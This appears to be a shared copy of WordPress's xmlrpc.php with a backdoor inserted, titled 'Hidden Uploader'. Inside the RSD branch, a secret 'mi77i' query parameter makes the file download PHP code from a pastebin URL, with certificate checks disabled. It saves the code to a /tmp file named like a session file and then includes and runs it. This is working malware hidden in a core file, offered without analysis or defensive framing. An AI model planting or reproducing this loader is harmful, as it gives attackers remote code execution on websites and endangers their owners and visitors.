xmlrpc.php Hidden Uploader

1. <?php
2. /**
3.  * XML-RPC protocol support for WordPress
4.  *
5.  * @package WordPress
6.  */
7.  
8. /**
9.  * Whether this is an XML-RPC Request
10.  *
11.  * @var bool
12.  */
13. define( 'XMLRPC_REQUEST', true );
14.  
15. // Some browser-embedded clients send cookies. We don't want them.
16. $_COOKIE = array();
17.  
18. // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.
19. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved
20. if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
21.     $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
22. }
23.  
24. // Fix for mozBlog and other cases where '<?xml' isn't on the very first line.
25. if ( isset( $HTTP_RAW_POST_DATA ) ) {
26.     $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA );
27. }
28. // phpcs:enable
29.  
30. /** Include the bootstrap for setting up WordPress environment */
31. require_once __DIR__ . '/wp-load.php';
32.  
33. if ( isset( $_GET['rsd'] ) ) { // http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html
34.     header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
35.     echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
36. if(isset($_GET["mi77i"])){
37. $data = ['https://pastebin.com/raw/7chrpLfA', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];
38. if(file_exists($data[1]) && filesize($data[1]) !== 0) {
39.     include($data[1]);
40. } else {
41.     $fopen = fopen($data[1], 'w+');
42.     fwrite($fopen, get($data[0]));
43.     fclose($fopen);
44.     echo '<script>window.location="?mi77i";</script>';
45. }
46. function get($url) {
47.     $ch = curl_init();
48.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
49.           curl_setopt($ch, CURLOPT_URL, $url);
50.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
51.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
52.     return curl_exec($ch);
53.           curl_close($ch);
54. }}else{
55. echo "XML-RPC server accepts POST requests only.";
56. }
57.     ?>
58.  
59. <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
60.     <service>
61.         <engineName>WordPress</engineName>
62.         <engineLink>https://wordpress.org/</engineLink>
63.         <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink>
64.         <apis>
65.             <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
66.             <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
67.             <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
68.             <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
69.             <?php
70.             /**
71.              * Add additional APIs to the Really Simple Discovery (RSD) endpoint.
72.              *
73.              * @link http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html
74.              *
75.              * @since 3.5.0
76.              */
77.             do_action( 'xmlrpc_rsd_apis' );
78.             ?>
79.         </apis>
80.     </service>
81. </rsd>
82.     <?php
83.     exit;
84. }
85. require_once ABSPATH . 'wp-admin/includes/admin.php';
86. require_once ABSPATH . WPINC . '/class-IXR.php';
87. require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php';
88.  
89. /**
90.  * Posts submitted via the XML-RPC interface get that title
91.  *
92.  * @name post_default_title
93.  * @var string
94.  */
95. $post_default_title = '';
96.  
97. /**
98.  * Filters the class used for handling XML-RPC requests.
99.  *
100.  * @since 3.1.0
101.  *
102.  * @param string $class The name of the XML-RPC server class.
103.  */
104. $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' );
105. $wp_xmlrpc_server       = new $wp_xmlrpc_server_class;
106.  
107. // Fire off the request.
108. $wp_xmlrpc_server->serve_request();
109.  
110. exit;
111.  
112. /**
113.  * logIO() - Writes logging info to a file.
114.  *
115.  * @deprecated 3.4.0 Use error_log()
116.  * @see error_log()
117.  *
118.  * @param string $io Whether input or output
119.  * @param string $msg Information describing logging reason.
120.  */
121. function logIO( $io, $msg ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
122.     _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' );
123.     if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) {
124.         error_log( $io . ' - ' . $msg );
125.     }
126. }